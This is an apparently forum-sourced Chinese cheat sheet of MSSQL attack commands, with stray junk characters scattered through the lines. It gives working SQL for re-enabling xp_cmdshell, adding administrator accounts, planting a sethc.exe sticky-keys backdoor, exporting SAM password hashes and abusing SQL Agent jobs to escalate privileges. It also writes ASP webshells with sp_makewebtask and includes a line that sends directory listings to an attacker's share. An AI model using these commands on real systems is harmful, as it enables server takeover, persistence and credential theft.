1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号; T3 ?5 `7 [+ j" }
恢复方法:查询分离器连接后, P a. V- k+ B* U
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int # z! v D1 U0 ~+ a S! T
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' + c* o: s" \. s2 ?5 O& w0 ~+ p
然后按F5键命令执行完毕
. F( c# c! [/ ]
* _2 {7 X6 V; k2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
; `5 U8 f7 C# c; g0 v+ w% S4 F* s恢复方法:查询分离器连接后,& Q3 P- K7 ^) h/ y
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"8 W+ j( x) d+ J
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! R6 r" c) L! u/ ~! K
然后按F5键命令执行完毕
[5 k$ e4 E ?! q6 O6 w* ^8 N$ y( o" c
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)% L( [0 L; \9 l/ R' I% T
恢复方法:查询分离器连接后,
# j5 ~" n, T8 v第一步执行:exec sp_dropextendedproc 'xp_cmdshell'* G. c6 S9 _- \( D: t Y0 h
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 8 ^: B% v1 D6 ^% q1 Q
然后按F5键命令执行完毕" d3 N6 n, \1 [
9 W/ I. d8 S8 T0 J4 终极方法.
& B0 N/ W% s( K& O如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:/ I/ t" B1 l$ y
查询分离器连接后,7 A5 D) B, z7 j- A
2000servser系统:
- Q2 a: N9 O8 ?4 P, T! i( edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
- R4 A/ b T" B8 i+ I- W% y
$ i8 t, s" G! H9 X1 z( G. _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'+ {0 A# R/ j, O
8 R# t* _- ]; m: Y& ^2 Q: j$ }xp或2003server系统:
2 e5 j! s2 B8 C( Y/ M0 S( k" a" F, |5 n: Z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'* Z+ q! k X, \
- z, M! D2 S9 H; g4 S7 o" v+ g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add') P0 [8 K8 k& Q, x/ g
! t% M4 L$ Q4 T
/ c8 }% g3 Y" O% H# U9 f五个SHIFT& r- n2 d! s8 ]& @
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';7 m( E# f C3 L! Q
% L& H `5 v# n
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; * k) x* B* q0 @5 n4 a7 t
0 }! g8 U, m6 R: p# I' `9 A
xp_cmdshell执行命令另一种方法! L/ s. {; W* \* h% V
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' 1 t0 l$ w+ [0 T: K- V
5 e( K! M- Q. I6 i y, |9 q% `判断存储扩展是否存在
9 `4 i( \+ T, c2 TSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'8 e+ N/ R9 o% l; D
返回结果为1就OK6 v1 U7 T& B) K, W5 y/ D
0 R& ~2 R- r; K8 K
" {" _2 S- ?" p, C5 d4 |上传xplog70.dll恢复xp_cmdshell语句:7 _& `" N7 c7 A Q
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'0 V! v2 |' e! m& X
3 ~: i( D5 ~, i- C4 h4 ~
否则上传xplog7.0.dll
3 B5 O: Y; r5 x9 T4 h7 M0 u% F7 k" p! fExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'/ d5 }/ v' S7 T% y
' H# g8 K m" ], e; I6 ~1 A1 l
3 M, F, f, H$ Z; K% ~. J4 D
+ y d8 Y6 M* G- t# j6 r5 V* A首先开启沙盘模式:& P# @2 ]# v2 H5 G/ c
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',12 T: N. Z" v1 |) h( Q* k5 }
! M+ l5 Y' q; X. Z
然后利用jet.oledb执行系统命令- n1 f3 T0 v! o& i% \2 r
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')* w8 R$ S0 h' [3 {, f P' Z G8 D
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
: o: `) `$ s4 ^! h; n. M# m" d5 @6 E+ G8 D
2 r' n7 p) X# `0 N0 T
( I, g8 e7 A5 w# p6 u7 d/ l8 L3 @2 s; K恢复过程sp_addextendedproc 如下:
- D4 N, m P4 Y( O" i+ Q% fcreate procedure sp_addextendedproc --- 1996/08/30 20:13
' r% _% E; G4 K2 r@functname nvarchar(517),/* (owner.)name of function to call */ ! W/ I$ a/ v1 o* j7 J8 A; x% E# d
@dllname varchar(255)/* name of DLL containing function */ " E+ T7 F# c9 \# u% i7 s
as
- v1 T; \+ g: u' V+ P% H. Cset implicit_transactions off
0 A; g. M; T6 f: s& M6 f* q gif @@trancount > 0
5 @* g: o) \ Qbegin 7 i$ x7 e$ K2 Z% j3 S$ H3 C
raiserror(15002,-1,-1,'sp_addextendedproc') ; H! W5 A, J4 y, n8 k* U* x1 J- x9 D
return (1) 6 I, c& Y& ?7 p* ]6 V
end " L4 m- P# |2 P+ ^9 V& ?* L9 w# x
dbcc addextendedproc( @functname, @dllname)
8 z, X" m' ~( f$ O. x5 B- Freturn (0) -- sp_addextendedproc 4 W( Q! m8 B! P# L: R- [# s5 b, m
GO
" C# |0 @5 ^. X& ]4 _' c# p ~! T/ L. f4 G8 x! i; B( O& _
/ d4 Z# E7 j2 L& @9 ? v
. `$ i/ l ]. i6 F6 }" m. T
导出管理员密码文件7 k9 n3 B6 g' r5 V4 C+ q
sa默认可以读sam键.应该。5 p4 L3 b+ a. J( p9 D
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg# D0 @0 E& i* y7 L1 @* i
net user administrator test
) V r% w4 }. @; z用administrator登陆.
9 _; |/ i9 o6 k5 E; Y# b用完机器后
' w6 G7 z C& A- S) X0 ?/ nreg import c:\test.reg
% v% v) L+ N' {根本不用克隆.
$ l/ n( w* m \找到对应的sid.
/ z6 m7 P+ i3 N2 y/ K
9 `2 e& G7 H0 P7 m) t6 z5 s1 S( R; R) |
4 L f, ^1 m ?; u6 D恢复所有存储过程
% I7 K5 A* G/ [7 iuse master , g! i! {3 P b, J9 M z
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' M" d+ a+ ?$ K; x7 w; Z$ B
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' 0 N7 M% G) i$ f9 g3 Z1 y
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
1 j& X& [/ X) q/ W+ wexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
7 @1 t+ W1 t# z) k0 p8 qexec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 7 x# s4 j; q3 j" H9 M: m! D2 v
exec sp_addextendedproc sp_OACreate,'odsole70.dll' & A" R3 j% l4 N, ?' B
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' & ]' Y7 V7 g5 H0 T; ~0 \, s/ v# ?7 y
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
$ |$ [2 T/ } e9 |. Texec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' $ j6 K+ v) ~. D v
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
9 C" K3 l- ?& qexec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
# o5 X' `1 A( z% w- E. D6 j( Xexec sp_addextendedproc sp_OAStop,'odsole70.dll'
/ U7 ~7 x5 c4 X" k) B0 oexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
1 n, H) S8 j9 v A y$ g7 Q# qexec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
1 X6 ?# d8 h; }$ Nexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
- _. c5 h! U. }+ rexec sp_addextendedproc xp_regenumvalues,'xpstar.dll' R& l; Y& W. S; \6 u% N+ ?' i
exec sp_addextendedproc xp_regread,'xpstar.dll' 1 x! Z/ d4 t _% [
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
* D- p+ [* W p! mexec sp_addextendedproc xp_regwrite,'xpstar.dll' ; M N. G1 |9 t1 R9 J! W# W4 _
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'3 y# n6 { h) C8 ~; \! d# C m1 x
0 c- ^/ N N, D& o! r5 r) `7 b) q
& i& m2 G9 Y9 e# R建立读文件的存储过程
/ d4 V5 ]/ i' K/ q Z# h3 W5 UCreate proc sp_readTextFile @filename sysname
3 K% l+ J4 \. C, Tas6 A, J$ x# \/ |3 Q4 {
3 B5 I0 o/ T# @" v0 K
begin
' }( d f, ?! z6 ]% ~+ U set nocount on
1 _- M1 O! V' \& J9 X( N Create table #tempfile (line varchar(8000))
2 K) u$ z# P7 U3 B exec ('bulk insert #tempfile from "' + @filename + '"')- K" c- C; p/ r
select * from #tempfile7 N* l% o8 }* G
drop table #tempfile8 N4 t; h# h- C0 x
End
0 G) w/ X- b6 u6 U9 N5 M& L5 C7 U& q1 |! ~8 a4 B
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件. l! V# B- |, D* ^
查看登录用户! _( p4 i# K3 G$ P- U! o8 U
Select * from sysxlogins! P; y6 w4 }( t$ x6 D
4 O8 d/ o! [, V, d h" J
把文件内容读取到表中7 J) ]! a- Q" b6 Q# \5 b* Q9 r
BULK INSERT tmp from "c:\test.txt"
0 s9 i2 q0 g2 E5 H+ }dElete from 表名 清理表里的内容0 h9 b8 v$ o) x
create table b_test(fn nvarchar(4000));建一个表,字段为fn- a* ^ f: T9 t8 A2 @
8 Y6 b h3 { p- h4 @, i9 x
, V) T2 z# A% v! y& s. w& t加sa用户% r F4 P7 x% X) i
exec master.dbo.sp_addlogin user,pass;
/ ]. H: Z$ l" S8 jexec master.dbo.sp_addsrvrolemember user,sysadmin
7 p4 N' F0 V9 z, q
1 L T0 \) k& q* K% G
+ X* ?% W! Z) p+ _ n3 o, @3 U* @; j+ y0 s* D, `" J# B
读文件代码
0 k. v. N% p% N0 kdeclare @o int, @f int, @t int, @ret int2 H1 K0 g' G1 Q2 U
declare @line varchar(8000): F: H5 l5 O" N- [0 U! L( I
exec sp_oacreate 'scripting.filesystemobject', @o out) R& S, {4 k& |: f# S; U8 u
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 19 Y' R9 b, |0 r3 b; n
exec @ret = sp_oamethod @f, 'readline', @line out
1 W r% Q4 n, H8 I7 vwhile( @ret = 0 )* d* Y. F8 @: f& P. n( s, o0 o
begin' j8 O5 q7 e$ y. K' H( L8 q! v
print @line5 G2 {' Q! ~2 D' x0 C
exec @ret = sp_oamethod @f, 'readline', @line out' q7 Q- \" L. F% K8 |: x U4 k
end w9 D. {5 ~5 {7 m0 `
9 m3 h3 H9 S( _/ L; c
) R" F3 `7 Q, W" x. @; ~: c; r写文件代码:
& X% ~1 o+ g8 o a6 M" @2 ~declare @o int, @f int, @t int, @ret int# E/ v8 R% `$ G2 t, U7 r- O4 Z [
exec sp_oacreate 'scripting.filesystemobject', @o out) F \- U" O; ^ U& h
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
$ Y6 ?- D% r0 h( L( Iexec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
1 y" S9 e# W5 Z% r# k" A5 s& K# U
3 l% b7 |+ ]1 I. Y: P/ {* @6 N) }9 I; i8 \4 |: ]4 d: H7 A; b
添加lake2 shell% q; Z9 }: U0 G' @# Q
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
0 `% A. @+ o, k1 _$ `sp_dropextendedproc xp_lake2. c6 u1 y1 e& c' s
EXEC xp_lake2 'net user'
/ }- D2 P7 \ i0 D5 a
7 t1 K/ U X- J7 R& M* y9 `- G6 Z# p
得到硬盘文件信息
9 R0 o$ ?9 M1 Z: C0 z$ i--参数说明:目录名,目录深度,是否显示文件 ) x _; r1 Q# T8 A6 e3 w& ^
execute master..xp_dirtree 'c:' ) T6 |. I7 h7 [* {
execute master..xp_dirtree 'c:',1 ' ?7 C" i) d4 C& W/ d
execute master..xp_dirtree 'c:',1,1
/ J* K9 G; ^: l1 Z. D1 Z
) W/ \% H( p7 f* C' l" C/ z4 S4 b! s8 w2 a% L
读serv-u配置信息( H" [$ ^- X( `1 J6 o/ t% ?: c
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
- p: m6 ~5 V1 E) ]- J5 {; N8 Aexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
\' M8 f( e* k! v% T: V4 t. y4 z
通过xp_regwrite写SHIFT后门
( ^+ ?% @1 g# l& L# Z6 |exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
2 O3 N. K& ~7 [2 z
3 d+ U3 r9 H- E3 |* B6 V! Q- ]$ z( [# [+ F. S3 i
5 v4 w0 ?* {# X1 _* u! L9 O/ g
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';9 }' m3 V5 l: t' F4 w' k6 a& k
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
6 ^3 N, V0 T) l9 ?: p+ n' Z4 E, k
: C% Z2 Y9 s8 K2 u/ x) u }* X* tEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'* S' I6 h+ x7 s; W
; t; C1 @" r v" `
/ D; D! [" w: S3 ]( P
& K+ R2 b/ @/ C/ |( y Y6 Ssql server 2005下开启xp_cmdshell的办法
8 |( U& U" u' x' v
/ @% A0 c7 ~/ |1 l+ x$ U9 Q9 A' C& KEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
% {9 t' }( [. Z- B$ B6 u. t+ Z& Q. w" j; L: n; R4 q3 m' Q
SQL2005开启'OPENROWSET'支持的方法:. y3 @5 A+ ?3 L9 W! h
4 H m+ U* [. |
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;9 R8 N& @: @& o7 G
/ d6 u2 S! `: a% USQL2005开启'sp_oacreate'支持的方法:- ], C6 e" P. R
7 E' k8 q( V; n
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
+ f" I; v9 K5 T# L! w& V
& J! W1 h E: I# y0 [3 A4 A4 X9 m8 e) a
. c2 N/ @1 z) v$ _1 ?
% Q; o+ r# l \$ V' g" u# g8 [
/ Z3 `" V( }2 r
x$ p8 N- G, k& r, G
5 l7 k8 L6 _0 U0 L \
/ U2 o8 X. a* Q& o
+ s3 z$ }' }0 |" E
9 n2 h& y& P3 ~$ {5 C
) R* t! _- [; l2 G' l( V1 @
. K. H0 o; W# f" h' F2 F' Q1 _7 g* {2 w
9 _0 ?0 U& g- q+ j5 S" I! f+ {
* E0 O* s# X* A, |' [+ K4 Q- h
& \4 @9 [8 ]9 ^
2 y4 k7 e3 V" }3 b& {" j6 c+ k3 ^$ L, [9 U% a
5 X: \* @- D2 N2 F, W# L5 e
3 n# V9 v. t. V7 V/ i' w) N/ K1 @) o; [4 I* W: h i" v/ V
, n, [+ E! U: P6 ^: u2 D# w
% h' i0 i2 H2 w# Z7 V- B q, X
# x! Z$ T1 T `* t3 n
以下方面不知道能不能成功暂且留下研究哈:( p; q3 D# i0 n$ q0 Z- d, f
4)
2 a& \6 G) J4 O0 R0 c- P/ cuse msdb; --这儿不要是master哟
; q- h# c3 m4 ?! w1 @exec sp_add_job @job_name= czy82 ;
; }% q2 h+ r F6 {2 M1 pexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
4 ^& g' N3 h! V# {, ?exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;3 E8 F8 c5 e$ Y/ q: B9 u
exec sp_start_job @job_name= czy82 ;
" f$ z2 F# Q7 q# n7 g# I9 _+ G
+ f+ E5 r: m4 G) b1 O利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以7 `. f4 K( S( Q
执行tsql语句了.
3 c1 x' k$ @0 l. t% P对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
4 O5 x3 [2 Q! g9 y: b4 k/ q6 o第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
' G( E2 Q& W; pnet start SQLSERVERAGENT1 B# C7 p5 u- n) i& @; a
2 A Z9 |# }* H( @$ [3 x对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
% C& J/ S5 Z2 o0 W% |1 tUSE msdb
1 }8 T/ _* Q2 i& uEXEC sp_add_job @job_name = GetSystemOnSQL ,' C6 c D, I, Y; Q/ ]9 x
@enabled = 1,4 z+ d# ?& N6 N2 F! V
@description = This will give a low privileged user access to# a6 A2 y R7 U9 o, v2 h
xp_cmdshell ,; i) ?. b4 l4 R6 y5 D
@delete_level = 1
' h6 p0 j# }3 L; A$ X% uEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,8 a2 d0 g1 \# x
@step_name = Exec my sql ,! Q ?* b% k S `
@subsystem = TSQL ,7 P1 G3 u! _* n* l! Z
@command = exec master..xp_execresultset N select exec
4 @$ y# V# x8 G0 \! Z: Dmaster..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
v0 {/ D' {# H y* OEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
8 {/ F3 ~2 M1 [1 j9 j@server_name = 你的SQL的服务器名 0 v: R7 h' w& E- D9 e
EXEC sp_start_job @job_name = GetSystemOnSQL 5 U8 b$ T3 j+ [2 V
. S0 W% s& i$ `( C9 ~0 {不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
! D" M$ Z0 I& D, g f9 h0 m才让我们可以以public执行xp_cmdshell6 p; `) }# i/ `3 o" M& p
" |/ A8 |, d$ d% D5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
; n1 n) c, L6 I6 k$ S9 a, V" _, n0 J在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968# j( a) e3 e. e& g
, ~# @. l6 E* HUSE msdb( u+ A' c7 e5 F3 @' { _' m
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
7 X, ~4 F7 B5 C1 _4 |( N@enabled = 1,
( l; G& B: j4 i5 }8 P! S' q@description = This will create a file called c:\sqlafc123.txt ,
0 L, V% } A4 W: c! Y1 ?, w@delete_level = 12 c1 S7 W' O/ Q9 d# q) Z1 Y6 ~
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
, ]/ x( l P' ]$ V6 ?& t, V@step_name = SQLAFC ,
, K" i% Z8 C' o2 O/ a) f@subsystem = TSQL ,
3 `) ]7 i( ?: S' i) X@command = select hello, this file was created by the SQL Agent. ,
0 x% y" B5 u: y# ~- _3 k* g@output_file_name = c:\sqlafc123.txt & l; y' h0 ?" h) Z
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,% J9 p3 |. ^! }/ O
@server_name = SERVER_NAME
# b7 E5 C: V' |2 B0 F7 H! UEXEC sp_start_job @job_name = ArbitraryFilecreate 2 c9 E+ ]) a2 _% E+ e' ^/ I) L6 N
% e0 |; [ j* r, m- |
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
+ ^: z1 |3 q0 {; Z
, @; ^! C& n+ X) q) ^4 R??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
% m: s T( A. b# b: x3 k$ n9 ^# C----------------------------------------------* w6 Q7 _ d* C# h
hello, this file was created by the SQL Agent.: l( G4 [$ G2 j/ _! s+ R
% R: {% L+ D l& J(1 ?????)) L# P" \( _" h& g* k; X: y; E
7 u! R5 W% J2 N所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员& V; \$ \+ K: ~6 L: c- w
命令的vbs文件到启动目录!
; y/ s% H4 F/ `
1 d5 o' w3 g. T0 A6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
' V! A5 x+ S& g; k" I1 p关于sp_MScopyscriptfile 看下面的例子
6 O# z& s6 S2 k6 A& _declare @command varchar(100) ; p6 f, [) U1 Q" z* r1 M
declare @scripfile varchar(200)
/ W; J& e9 O, A! ^. K! q' o' |# ~' ?set concat_null_yields_null off ; M, g. \' }1 @8 n
select @command= dir c:\ > "\\attackerip\share\dir.txt"
4 q' ]& S+ m2 ? O' ?select @scripfile= c:\autoexec.bat > nul" | @command | rd "
' J; f: I1 O8 I" i q |( Zexec sp_MScopyscriptfile @scripfile , - E& K$ L; b1 X( `# Q% H$ E
5 S& p1 `- \/ L) o& u; e0 q
这两个东东都还在测试试哟
* h! y& k8 f7 v: j4 g/ c! D2 I让MSSQL的public用户得到一个本机的web shell
[/ a* t& y& t9 V% G8 q0 j! T: E
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
* f' g/ ]( F+ x--@query= select <img src=vbscript:msgbox(now())> ( c+ k1 B- i7 b: P7 K
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
& q4 m' B; W3 z' t# N" B@query= select $ ~- u7 b1 {, Q; O8 o; p2 z% t9 N
<%On Error Resume Next & w4 D3 m" p% k: I
Set oscript = Server.createObject("wscript.SHELL") 7 Y* P5 n) h; F/ {
Set oscriptNet = Server.createObject("wscript.NETWORK") : m; K' B" t6 T( e! ^! g
Set oFileSys = Server.createObject("scripting.FileSystemObject")
: s% s9 ]& p$ a3 P& _2 NszCMD = Request.Form(".CMD") 1 B6 g& y7 I% L4 Y2 y( d9 |! U
If (szCMD <>"")Then & B5 T* w c# h1 d9 T9 L2 R" {5 a
szTempFile = "C:\" & oFileSys.GetTempName() ; {5 N& D# _) r0 d+ ?
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) f Z' {$ V v" p' \2 }" z
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) % P/ M# u7 f9 }
End If %> 9 l# K: |; ]. J( v4 Y
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> " `2 i# P3 q1 |
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
# \! A4 m3 \8 z4 X& Y</FORM>< RE> 4 h) A* }0 k2 ]8 w
<% If (IsObject(oFile))Then
4 z# }9 |) T( v0 Q! nOn Error Resume Next c* p& j2 c+ w' q
Response.Write Server.HTMLEncode(oFile.ReadAll)
& c. S/ G' ~6 }6 m4 |oFile.Close ) j k0 g( L4 x- o5 y& w1 F: d
Call oFileSys.deleteFile(szTempFile, True) 4 h1 W. n _- I ?* W$ }4 _& }: O
End If%>
* j" T, o( n1 `# \# _; V- V% w</BODY></HTML> ' E: q. F* Z" h. i2 j7 S+ b* D
|